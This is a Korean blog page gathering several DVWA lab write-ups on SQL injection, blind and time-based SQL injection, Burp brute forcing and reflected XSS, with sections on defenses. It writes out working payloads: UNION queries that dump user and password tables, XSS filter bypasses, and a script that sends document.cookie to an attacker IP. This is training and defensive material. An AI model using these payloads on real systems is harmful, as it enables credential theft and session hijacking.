반응형
SMALL

'웹해킹/DVWA'에 해당되는 글 18건

반응형
LIST
반응형
SMALL

1. SQL 인젝션 공격 대응 방안

SQL 인젝션 공격과 같은 모든 파라미터 입력값 조작으로 이뤄지는 공격은 입력값 검증을 통해 대응이 가능하다. 대표적인 방어 방법은 화이트리스트 검증이다.

 

 $query = "Select first_name, last_name FROM users WHERE user_id='$id';";

 

위와 같은 쿼리 방식은 $id 방식이 입력값을 조작할 있을 가능성이 높기 때문에 매우 취약한 SQL 쿼리다.

 

[그림 1-1] SQL 방어 쿼리 - 1

SQL 인젝션 대응 방안이 되는 모범 코드다. 윗쪽에는 CSRF 공격 방어까지 구현되어 있어 CSRF 공격도 하기 힘든 구조다. SQL 인젝션 공격을 방어하기 위해 사용하는 방법은 파라미터 쿼리로 변경하는 것이다. Check the database 주석을 보면 prepare, bindParam, execute 호출해 쿼리문을 실행한다. Prepare 함수에선 미리 실행할 쿼리문의 형태를 작성하고 사용자 입력값이 들어가는 $id 부분은 bindParam 함수에서 실행할 있도록 하는 형태를 띠고 있다. , 데이터베이스는 어떤 것이 코드고 어떤 것이 쿼리인지 구분을 있게 되기 때문에 공격자가 입력값을 조작하려고 해도 쿼리문에서 일부가 수가 없고 데이터로 처리되기 때문에 SQL 인젝션 공격을 효과적으로 방어 있다.

 

[그림 1-2] SQL 방어 쿼리 - 2

SQL 인젝션 High 단계의 소스 코드다. [그림 1-1] 소스 코드와 비교해 봤을 따로 처리하는 함수가 없고 온전히 쿼리 안에서만 처리하려고 하기 때문에 공격자가 입력값을 조작하는게 가능하다. LIMIT 1이라는 레코드 제한을 걸어도 #이나 -- 같은 주석으로 우회가 가능하기 때문에 안전한 소스 코드라곤 없다.

 

 

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

SQL 인젝션 공격 (3)  (0) 2020.01.28
SQL 인젝션 공격(2)  (0) 2020.01.28
SQL 인젝션 공격 (1)  (0) 2020.01.28
브루트 포스 공격 대응 방안  (0) 2020.01.26
브루트 포스 공격  (0) 2020.01.26
블로그 이미지

만년필석사

,
반응형
SMALL

1. SQL 인젝션 공격 High 단계 실습

[그림 1-1] SQL 인젝션 공격

DVWA 레벨을 high 설정한 SQL Injection 탭을 클릭하면 기존과는 다르게 영어로 링크가 있다. 링크를 클릭한다.

 

[그림 1-2] 소스코드

SQL 인젝션 공격에 앞서 소스코드를 확인하면 '$id' 뒤에 LIMIT라는 쿼리가 추가 되어 있는데 쿼리는 레코드의 개수를 제한한다. 현재 쿼리는 1 제한 되어 있지만 부분을 우회하기 위해 주석처리를 한다면 우회가 가능하다.

 

[그림 1-3] SQL 인젝션 공격

앞에 값이 참이든 거짓이든 부분을 참으로 만들어 쿼리가 동작하는 구문을 삽입한다. 1' or '1'='1'# 입력한 전송한다. # 주석으로 소스코드에서 Limit 1 우회하기 위해 사용된다.

 

[그림 1-4] 공격 성공

1' or '1'='1'# 입력한 전송된 결과 SQL 인젝션 공격이 성공했음을 확인할 있다. Limit 1 우회되면서 전체 데이터베이스의 정보를 출력된다.

 

[그림 1-5]  테이블 정보

테이블 정보를 확인하기 위해 union SQL 공격 구문을 삽입한다. 1' union select user, password from users# 삽입하고 전송한다. Users 테이블에서 user, password 컬럼을 숫자 1 조합해 참을 만들어 추출한다는 쿼리다.

 

[그림 1-6]  테이블 내용

1' union select user, password from users# 쿼리 전송 결과 아이디, 패스워드로 보이는 정보들이 노출되었음을 확인할 있다. 패스워드는 암호화 되어 있지만 MD5 형식이고 구글에서 쉽게 평문으로 변환이 가능하다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

SQL 인젝션 공격 대응 방안  (0) 2020.01.28
SQL 인젝션 공격(2)  (0) 2020.01.28
SQL 인젝션 공격 (1)  (0) 2020.01.28
브루트 포스 공격 대응 방안  (0) 2020.01.26
브루트 포스 공격  (0) 2020.01.26
블로그 이미지

만년필석사

,
반응형
SMALL

1. Blind SQL 인젝션 공격 개요

Blind SQL 인젝션 공격은 임의의 SQL 구문을 삽입해 인가되지 않은 데이터를 열람할 있는 공격 기법이라는 것은 다른 SQL 인젝션 공격 기법과는 크게 다르진 않다. 차이점이 있다면 일반 SQL 인젝션 공격은 임의의 SQL 조작된 쿼리를 입력해 한번에 정보를 보여 있지만 Blind SQL 인젝션 공격은 쿼리의 결과에 따른 서버의 참과 거짓의 반응을 통해 데이터베이스의 정보를 알아 있다. 일반 SQL 인젝션 공격에 비해 시간이 상당히 오래 걸린다는게 단점이지만 시간을 투자하면 언제든지 데이터베이스 정보를 탈취할 있기 때문에 위험한 SQL 인젝션 공격 기법 하나라고 판단할 있다.

 

(1) Blind SQL 인젝션 공격 실습

 

[그림 1-1] User ID 입력

Blind SQL Injection 탭을 선택하고 User ID 값에 1 요청한다. 1 전송하면 User ID 존재한다고 표시된다.

 

[그림 1-2] User ID 입력

이번엔 User ID 값에 6 요청한다. 6 전송하면 User ID 존재하지 않는다고 표시된다. 이러한 응답값을 통해 데이터베이스는 5개가 된다는 것을 추측할 있다.

 

[그림 1-3] 정상값 처리

AND 뒤에 1=1#이라는 항상 참이 되는 조건을 추가해 삽입하고 실행한다. 1'이라는 값이 참이기 때문에 뒤에 1=1# 이라는 참이 되는 조건을 추가하면 데이터베이스는 존재한다는 것을 있다. 만약 SQL 인젝션 쿼리문이 실행되지 않는다면 ID 1 아니라 1' AND 1=1# 전체 문자열을 하나의 ID 처리하고 비정상적인 값은 실행하지 않아 User ID 없다는 메시지가 나와야 한다.

 

[그림 1-4] 비정상값 처리

AND 뒤에 1=2#이라는 거짓이 되는 조건을 추가해 삽입하고 실행한다. User ID 존재하지 않는다고 출력된다. AND 뒤에 1=2 거짓이 되기 때문에 앞에 붙은 조건과 관계 없이 거짓이 된다. , AND 이후 조건에 따라 결과가 바뀐다는 거고 입력하는 값이 SQL 쿼리문을 통해 처리되고 있다고 추측할 있다.

 

[그림 1-5] 소스 코드

소스 코드를 보면 빨간색 박스 안에 SQL 쿼리문을 구성하고 있다. User_id='1' AND 1=1 같이 전제가 참인 조건문이 되서 사용자가 존재한다고 출력된거고 AND 1=2 입력하면 where 구문이 전부 거짓이 되서 사용자가 없다고 출력한 것이다. 이와 같이 , 거짓이 구분 되서 출력되는 것은 SQL 쿼리문이 뒤에서 사용되고 있는 것을 추측해 있다.

 

(2) Time based SQL 인젝션 공격 실습

 

[그림 2-1] sleep 함수

User ID 1' AND sleep(5)# 입력한 요청한다. 개발자 도구를 활용해 응답시간을 확인하면 5 동안 응답값이 지연 되는 현상을 있다.

 

[그림 2-2] sleep 함수

이번에는 User ID 6' AND sleep(5)# 입력한 요청한다. 개발자 도구를 활용해 응답시간을 확인하면 응답값이 지연 되지 않고 응답 되는 현상을 있다. 앞에 6' 거짓이기 때문에 응답값이 지연 되지 않고 응답 되는 것이다. , 6이라는 데이터베이스는 존재하지 않는 것이다. 조건이 참일 때만 응답값이 지연되고 거짓일 응답값이 지연되지 않는 , 거짓을 통해 구분할 있게 된다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

SQL 인젝션 공격 대응 방안  (0) 2020.01.28
SQL 인젝션 공격 (3)  (0) 2020.01.28
SQL 인젝션 공격 (1)  (0) 2020.01.28
브루트 포스 공격 대응 방안  (0) 2020.01.26
브루트 포스 공격  (0) 2020.01.26
블로그 이미지

만년필석사

,
반응형
SMALL

1. WHERE 구문

 

[그림 1-1] WHERE SQL 인젝션 공격 과정

[사진 출저: 화이트해커가 되기 위한 8가지 웹 해킹 기술]

 

정상적인 경로라면 사용자가 ID 1 요청하기 위해 ID 1 출력하는 SQL 쿼리 구문을 애플리케이션에 요청하면 애플리케이션은 SQL 구문을 DB 전달한다. DB 필요한 정보를 추출해 ID 1 사용자 정보를 애플리케이션에 전달하고 애플리케이션은 사용자에게 전달해주게 된다.

이에 반해 악의적인 의도를 가진 공격자는 SQL 쿼리문을 조작해 요청값 이외의 정보도 탈취한다. 공격자는 ID 1 이외에도 다른 정보도 탈취하기 위해 or '1'='1이라는 쿼리를 추가해 애플리케이션에 요청하고 애플리케이션은 DB SQL 구문을 전달한다. DB에서 특별한 검증을 하지 않으면 요청 이외의 값들도 어플리케이션에 전달되고 어플리케이션에서 공격자에게 정보를 전달하게 된다.

 

 

(1) Where 구문 DB 정보 탈취 실습

[그림 1-2] 요청 ID

DVWA SQL Injection 항목을 실행하면 UserID 폼에 1 입력해 전송하면 DB 있는 정보들이 그대로 출력된다.

 

[그림 1-3] 소스코드

소스코드를 확인하면 별다른 검증값이 없고 '$id'라는 SQL 구문이 일치하면 DB 동작한다. ''이라는 세미콜론 안에 SQL 구문이 정상적으로 일치하면 SQL 인젝션 공격이 가능하다는 의미다.

 

[그림 1-4] SQL 공격 구문

[그림 1-3]에서 확인했던 ''값의 조건을 맞춰 SQL 공격 구문을 삽입한다. 1' or '1'=1 삽입하면 '' 조건에도 맞게 되고 OR 연산자를 사용하게 되서 OR , 부분만 맞게 되도 참으로 반환되기 때문에 SQL 인젝션 공격이 성사된다. 해당 구문의 SQL 인젝션 공격이 성공하면 모든 DB 정보를 탈취할 있다.

 

2. Union 구문

 

[그림 1-1] UNION SQL 인젝션 공격 과정

[사진 출저: 화이트해커가 되기 위한 8가지 웹 해킹 기술]

 

정상적인 경로라면 사용자가 ID 1 요청하기 위해 ID 1 출력하는 SQL 쿼리 구문을 애플리케이션에 요청하면 애플리케이션은 SQL 구문을 DB 전달한다. DB 필요한 정보를 추출해 ID 1 사용자 정보를 애플리케이션에 전달하고 애플리케이션은 사용자에게 전달해주게 된다.

이에 반해 악의적인 의도를 가진 공격자는 SQL 쿼리문을 조작해 요청값 이외의 정보도 탈취한다. 공격자는 ID 1 이외에도 다른 DB 정보도 탈취하기 위해 1' union select name,pw from users#이라는 SQL 쿼리를 애플리케이션에 전달한다. union 구문은 두개 이상의 select 구문을 합치는데 사용하게 된다. 여기서도 요청 이외에 union 구문을 삽입해 참을 만들어 추가 DB 정보를 탈취한다. DB SQL 공격 쿼리 구문이 전달되고 별다른 검증값을 거치지 않는다면 DB 존재하는 모든 사용자의 이름, 비밀번호가 공격자에게 그대로 전달된다.

 

(1) Union 구문 칼럼 개수 추측 실습

[그림 1-2] Union SQL 공격 구문

Union SQL 공격 구문을 삽입해 실행하면 [그림 2-2] 같이 DB 정보가 그대로 노출됨을 확인할 있다. # Mysql 라인을 처리하는 주석으로 만약 ID, password 창이 있다면 ID # 적용되면 password 창은 모두 주석 처리 되서 참인 결과를 반환한다.

 

[그림 1-3]  SQL 공격 구문

칼럼의 개수를 확인하기 위해 select 1,1,1 삽입해 실행한다.

 

[그림 1-4] 에러 메시지

Union select 구문 실행 결과 에러 메시지가 출력된다. 이는 컬럼의 개수가 3개는 아니라는 의미다. 따라서 공격자는 컬럼의 개수는 2 임을 추측할 있다.

 

[그림 1-5] order by SQL 공격 구문

order by 구문은 SQL에서 지정된 컬럼순으로 오름차순, 내림차순으로 정렬을 해주는 역할을 한다. [그림 2-5]에서 컬럼의 개수를 알아보기 위해 order by SQL 공격 구문을 삽입하면 DB 정보가 그대로 노출 됨을 확인할 있다.

 

[그림 1-5] order by SQL 공격 구문

order by 뒤에 2 붙여 컬럼 2개를 묶어 실행한 결과 DB 정보가 그대로 노출 됨을 있다.

 

[그림 1-6] order by SQL 공격 구문

order by 뒤에 3 붙여 컬럼 3개를 묶어 실행한다.

 

[그림 1-7] 에 페이지

order by SQL 공격 구문 실행 결과 에러 페이지가 출력 됨을 확인할 있다. 에러 페이지가 출력 됨으로써 컬럼의 개수는 2개임을 추측할 있다.

 

(2) Union 구문 계정 탈취

[그림 2-1] 데이터베이스

데이터베이스 명을 알아보기 위해 1' union select schema_name,1 from information_schema.schemata #을 입력해 데이터베이스 명을 확인한다. 입력한 SQL 공격 구문은 schemata 테이블의 information_schema 컬럼에서 schema_name, 1의 정보를 가져와 앞의 1' 합쳐서 DB 정보를 출력한다는 의미다. Union SQL 공격 구문을 입력하면 데이터베이스 명을 있다.

 

[그림 2-2] dvwa 데이터베이스의 테이블 명

dvwa 데이터베이스의 테이블 명을 알아보기 위해 1' union select table_schema, table_name from information_schema.tables where table_schema = 'dvwa' # 입력해 테이블 명을 확인한다. table_schema dvwa 데이터베이스에서 tables 테이블의information_schema 컬럼에서 table_schema, table_name 정보를 가져와 앞의 1' 합쳐서 DB 정보를 출력한다는 의미다. Union SQL 공격 구문을 입력하면 테이블 명을 있다.

 

[그림 2-3] users 테이블 칼럼

Users 테이블의 칼럼 정보를 알아보기 위해 1' union select table_name, column_name from information_schema.columns where table_schema = 'dvwa' and table_name = 'users'# 입력해 테이블 칼럼을 확인한다. 기존과 형식은 비슷하지만 where 조건 뒤에 and table_name = 'users'# 추가되서 조회된다. DB 정보를 가져오면 users 테이블의 칼럼을 확인할 있다.

 

[그림 2-4] users 테이블 정보

users 테이블 정보를 알아보기 위해 1' union select user, password from users# 입력해 실행한다. 실행 결과 사용자 계정으로 추측되는 정보들이 있음을 확인할 있다. 아이디는 평문이지만 패스워드는 MD5 형식의 해쉬값으로 저장되어 있다. 하지만 MD5 형식의 해쉬값도 구글에 검색하면 바로 해독이 가능하다.

 

[그림 2-5] 해쉬값 해독

구글에 검색해 해쉬값 해독 결과 아이디가 admin으로 저장되어 있는 정보는 패스워드가 password 라는 것을 확인 있다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

SQL 인젝션 공격 (3)  (0) 2020.01.28
SQL 인젝션 공격(2)  (0) 2020.01.28
브루트 포스 공격 대응 방안  (0) 2020.01.26
브루트 포스 공격  (0) 2020.01.26
Reflected XSS 공격 (2)  (0) 2020.01.21
블로그 이미지

만년필석사

,
반응형
SMALL

1. 브루트 포스 공격 대응 방안

[그림 1-1] 로그인 페이지

브루트 포스 방어가 되어 있는 로그인 페이지는 오류가 3 이상 발생 시엔 15 동안 로그인을 차단한다. 3회에 15분을 기다려야 하기 때문에 브루트 포스 공격은 사실상 불가능하다.

 

[그림 1-2] 소스 코드 - 1

소스코드를 보면 패스워드는 md5 형태로 해서 처리하고 있으며 username 변수에 대해선  mysql_real_escape_string() 함수를 처리한다. 또한 만약 로그인에 실패했을 sleep 함수를 사용해 응답 속도를 늦춘다. 만약 일정한 응답 속도로 설정하면 공격자 입장에선 패스워드가 틀린 것이라고 생각하고 다시 공격을 시도 있게 된다. 하지만 [그림 1-2] 소스코드에선 랜덤하게 응답 속도를 설정해서 공격자가 입력한 패스워드가 일치하는지 불일치하는지 판단하기 어려워져 브루트 포스 공격에 부담을 있다.

 

[그림 1-3] 소스 코드 - 2

타임 아웃을 설정해놓는 소스코드다. 만약 3 이상 로그인이 실패하면 자동으로 15분동안 로그인이 금지된다. 하지만 정상적인 사용자도 3 이상 패스워드가 틀리면 15 동안 접속이 차단된다. 사용자의 ID 차단하기 보단 접속자 IP 차단하는게 가용성을 높일 있지만 접속자 IP 주소를 서버에서 관리를 해야 하기 때문에 서버의 부담이 늘어날 있는 단점이 있다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

SQL 인젝션 공격(2)  (0) 2020.01.28
SQL 인젝션 공격 (1)  (0) 2020.01.28
브루트 포스 공격  (0) 2020.01.26
Reflected XSS 공격 (2)  (0) 2020.01.21
Reflected XSS 공격 (1)  (0) 2020.01.21
블로그 이미지

만년필석사

,
반응형
SMALL

1. 브루트 포스 공격 개요

 

[그림 1-1] 브루트 포스 공격

[출저: 화이트헤커를 위한 웹 해킹의 기술]

브루트 포스 공격이란 특정 정보(사용자의 패스워드) 알아내는 공격이다. 만약 패스워드가 일치하지 않아도 계속 바꿔가며 공격할 있고 시간이 오래 걸리지만 언젠가는 계정 정보가 일치해 로그인이 가능하게 된다. 패스워드가 너무 쉽거나 추측 가능하게 설정하면 브루트 포스 공격에 의해 너무 쉽게 노출될 있다. 하지만 특수문자를 섞어서 설정하면 공격에 시간이 상당히 많이 소요되기 때문에 패스워드가 쉽게 노출될 없게 된다. 브루트 포스 공격 방지를 위해 페이지 내에 방어도 중요하지만 사용자의 비밀번호 설정 방식도 브루트 포스 공격을 예방하는 방법 하나가 있다.

 

2. 브루트 포스 공격 실습

(1) 자동 브루트 포스 공격

 

[그림 2-1] Intruder

브루트 포스 탭에서 계정 정보를 입력 프록시를 잡는다. 계정은 admin, 1234임을 있고 현재 정보를 Intruder 탭으로 보낸다.

 

[그림 2-2] Positions

 

페이로드 포지션에서 현재 패스워드 값을 알아내는게 목적이기 때문에 패스워드 부분에만 $ 표시한다.

 

[그림 2-2] payloads

페이로드 설정에서 Payload type Brute Forcer 선택한다. Payload Options에서 Character set 자동 지정되는데 영문자부터 숫자 9까지 지정된다. 부분에 특수문자들을 추가하면 Payload count 늘어나고 Max length 숫자를 높이면 unknown 표시된다. 그만큼 브루트 포스 공격을 하는데 있어서 많은 시간이 소요된다는 의미다.

 

[그림 2-3] 브루트 포스 공격

브루트 포스 공격 화면이다. 문자를 하나씩 넣어가며 자동화 공격을 시도하고 있다. 만약   응답 요청 길이가 다른 숫자 값으로 나온다면 문자열이 사용자 계정의 비밀번호다. 하지만 Brute forcer 이용한 공격은 많은 시간이 걸리기 때문에 비효율적인 방법의 브루트포스 공격이 있다.

 

(2) Dictionary 브루트 포스 공격

[그림 2-4] Intruder

브루트 포스 탭에서 계정 정보를 입력 프록시를 잡는다. 계정은 admin, 1234임을 있고 현재 정보를 Intruder 탭으로 보낸다.

 

[그림 2-5] Positions

페이로드 포지션에서 현재 패스워드 값을 알아내는게 목적이기 때문에 패스워드 부분에만 $ 표시한다.

 

[그림 2-6] payloads

Payload type Simple list 선택한 Payload Options에서 사용자들이 가장 많이 사용하는 패스워드를 담은 txt 파일을 만든 업로드 Start Attack 버튼을 누른다.

 

[그림 2-7] 브루트 포스 공격

브루트 포스 공격 시도 결과 응답 요청 길이가 다른 것이 있다. 2 응답 요청 길이는 5293이지만 1 응답 요청 길이는 5358이다. 사용자 계정 비밀번호는 1234라는 것을 있다. 패스워드가 올바르지 않은 경우면 로그인 실패 페이지가 응답되지만 패스워드가 올바른 경우면 로그인 성공 페이지가 출력되게 된다. , 1 요청은 로그인에 성공한 페이지가 응답된 것이라고 생각할 있다.

 

[그림 2-8] 소스 코드

소스 코드를 보면 비밀번호는 md5 해쉬화 해서 취약점은 발생하지 않는다. 하지만 username 별다른 조치 없이 SQL 문에 그대로 입력 됨을 있다. 하지만 쿼리 구문 아래 코드에서 SQL 결과 값이 1개일 때만 로그인 된다는 것을 있다. 경우에 사용자 비밀번호를 알지 못해도 SQL 인젝션 취약점이 발생할 있음을 추측할 있다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

SQL 인젝션 공격 (1)  (0) 2020.01.28
브루트 포스 공격 대응 방안  (0) 2020.01.26
Reflected XSS 공격 (2)  (0) 2020.01.21
Reflected XSS 공격 (1)  (0) 2020.01.21
Stored XSS 공격  (0) 2020.01.21
블로그 이미지

만년필석사

,
반응형
SMALL

1. Reflected XSS 공격 Medium 단계 실습

 

[그림 1-1] 공격 스크립트 삽입

Reflected XSS 공격을 시도 하기 위해 공격 스크립트를 삽입 요청을 보낸다.

 

[그림 1-2] 실행 결과

공격 스크립트 삽입 실행 결과 Low 레벨과는 다르게 XSS 공격 경고창이 나타나지 않는다는 것을 있다.

 

[그림 1-3] 소스 코드

Medium 레벨의 소스 코드를 보면 str_replace 함수로 <script> 문자열을 제거한다. 폼에 XSS 공격 스크립트를 삽입하고 요청을 보낼 <script> 문자열을 제거한 응답값이 오는 것이다. str_replace 함수는 대소문자를 구분하는 반면 HTML 대소문자를 구분하지 않는다.

 

[그림 1-4] 공격 스크립트 삽입

HTML 대소문자를 구분하지 않는다는 취약점을 이용해 <SCRIPT>alert(1)</SCRIPT> 공격 스크립트를 입력한 요청을 보낸다.

 

[그림 1-5] 공격 성공

<SCRIPT>alert(1)</SCRIPT> 공격 스크립트를 입력한 요청을 보낸 결과 우회되서 공격이 성공했다는 있다. XSS 공격을 방어하기 위해선 HTML 대소문자 구분 함수 구현도 필요하다.

 

2. Reflected XSS 공격 High 단계 실습

 

[그림 2-1] 공격 스크립트 삽입

Reflected XSS 공격을 시도 하기 위해 공격 스크립트를 삽입 요청을 보낸다.

 

[그림 2-2] 실행 결과

공격 스크립트 삽입 실행 결과 XSS 공격 경고창이 나타나지 않는다는 것을 있다. 결과 값만 봐도 문자열이 필터링 되었음을 있다.

 

[그림 2-3] 소스 코드

PHP의 preg_replace 함수를 이용해 <*s*c*r*i*p*t 규칙에 해당하는 문자열을 대소문자 구분하지 않고 제거한다. "<script", "<SCRIPT", "<SC\RIPT", "</script", "</SCRIPT", "</SC/**/RIPT" 등의 문자열을 제거하기 때문에 <script>를 이용해 자바스크립트를 삽입할 수 있는 방법은 없다.

 

[그림 2-4] 공격 스크립트 삽입

<script> 문자열을 없어 <img src=x onerror=alert(document.cookie)>라는 다른 XSS 공격 스크립트를 삽입한다. <img XSS 공격 스크립트 구문으로 많이 쓰이는 문자열 하나다.

 

[그림 2-5] 공격 성공

<img src=x onerror=alert(document.cookie)> XSS 공격 스크립트 요청 결과 우회되서 공격이 성공했음을 있다. <script> 뿐만 아니라 다른 문자열도 필터링 해줄 있는 시큐어코딩이 필요하다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

브루트 포스 공격 대응 방안  (0) 2020.01.26
브루트 포스 공격  (0) 2020.01.26
Reflected XSS 공격 (1)  (0) 2020.01.21
Stored XSS 공격  (0) 2020.01.21
CSRF 공격 (2)  (0) 2020.01.12
블로그 이미지

만년필석사

,
반응형
SMALL

1. Reflected XSS 공격 개요

리플렉티드 크로스 사이트 스크립팅 취약점은 요청 메시지에 입력된 스크립트 코드가 즉시 응답 메시지를 통해 출력되는 취약점이다. 입력된 스크립트가 마치 반사되는 것처럼 동작하기 때문에 붙은 이름이다.

 

 

 

[그림 1-1] Reflected XSS 공격 과정

[출저 : AhnLab Blog]

공격자는 사용자가 Reflected XSS 공격에 유도될 수 있도록 이메일, 게시판, SNS 등 공격자가 링크를 남길 수 있는 곳이라면 어디든 피싱을 한다. 사용자는 공격자가 걸어 놓은 악성 링크를 클릭하게 되면 공격 스크립트 코드가 삽입된 사이트로 이동되고 입력된 스크립트가 반사되어 그대로 웹 사이트에 출력된다. 웹 페이지를 읽은 웹 브라우저는 자동으로 스크립트를 실행하고 세션 쿠키를 공격자에게 전달한다. 세션 쿠키를 전달받은 공격자는 사용자의 권한으로 로그인할 수 있게 된다.

 

2. Reflected XSS 공격 실습

 

 

 

[그림 1-2] XSS 공격 구문

XSS 공격 구문인 <script>alert(1)</script>를 삽입한 후 Submit을 클릭해 웹 브라우저에 요청을 보낸다.

 

 

 

[그림 1-3] Reflected XSS 공격 실행

웹 브라우저에 요청을 보내면 곧바로 경고창이 실행된다. 이와 같이 스크립트가 응답되서 실행될 때 Reflected XSS 공격 취약점이 존재한다고 판단할 수 있다.

 

 

 

[그림 1-4] 쿠키 값 탈취 스크립트

웹 브라우저에 쿠키 값을 탈취할 수 있는 Reflected XSS 공격 구문을 삽입한 후 요청을 보낸다.

 

 

 

[그림 1-5] 쿠키 값 탈취

document.cookie 스크립트 코드로 인해 쿠키 값이 출력된다. PHPSESSID라는 쿠키는 php에서 생성된 세션 쿠키다. Reflected XSS 공격은 주로 세션 쿠키를 알아내기 위해 사용된다.

 

 

 

[그림 1-5] Redirect 스크립트

폼에 <script>document.location='http://192.168.171.172/cookie?'+document.cookie</script>를 입력하고 요청을 보낸다. document.location을 이용해 지정한 위치로 리다이렉트 시키는 스크립트다. 이 스크립트가 실행되면 웹 브라우저는 공격자의 호스트로 접속하게 된다.

 

 

 

[그림 1-6] 로그 검색

Tail 명령어를 활용해 파일의 내용을 확인한다. 웹 서버로 들어온 요청 정보가 기록되는데 DVWA에서 Reflected XSS 공격을 할 때마다 로그 파일에 로그가 계속 기록된다. 앞서 했던 쿠키 값을 탈취하기 위해 실행했던 document.cookie 스크립트와 함께 PHPSESSID 세션 쿠키 값도 모두 기록되어 있다는 것을 확인할 수 있다. Reflected XSS 공격은 사용자가 눈치 채지 못하게 공격을 해야 하기 때문에 사용자에게 피싱을 어떤식으로 하는지가 가장 중요한 관건이 된다.

반응형
LIST

'웹해킹 > DVWA' 카테고리의 다른 글

브루트 포스 공격  (0) 2020.01.26
Reflected XSS 공격 (2)  (0) 2020.01.21
Stored XSS 공격  (0) 2020.01.21
CSRF 공격 (2)  (0) 2020.01.12
CSRF 공격 (1)  (0) 2020.01.12
블로그 이미지

만년필석사

,